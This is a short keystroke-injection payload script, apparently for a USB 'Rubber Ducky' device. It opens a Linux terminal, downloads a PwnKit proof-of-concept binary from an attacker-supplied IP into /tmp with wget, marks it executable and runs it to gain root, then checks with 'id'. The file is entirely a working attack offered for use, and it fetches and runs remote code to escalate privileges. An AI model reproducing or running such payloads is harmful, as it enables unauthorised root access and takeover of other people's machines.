REM simple script to execute any command as root on linux using the (pwnkit) poc
REM ---------------------------------------------------------------------------


DELAY 4000

CTRL ALT T

DELAY 200

STRING cd /tmp

DELAY 150

ENTER

DELAY 100

STRING wget http://<YOUR_IP>/pwnkit_poc

DELAY 1000

ENTER

DELAY 1500

STRING chmod +x pwnkit_poc

DELAY 150

ENTER

DELAY 100

STRING ./pwnkit_poc

DELAY 150

ENTER

DELAY 200

REM root access starts here 

REM ----------------------------


STRING id

DELAY 50

ENTER
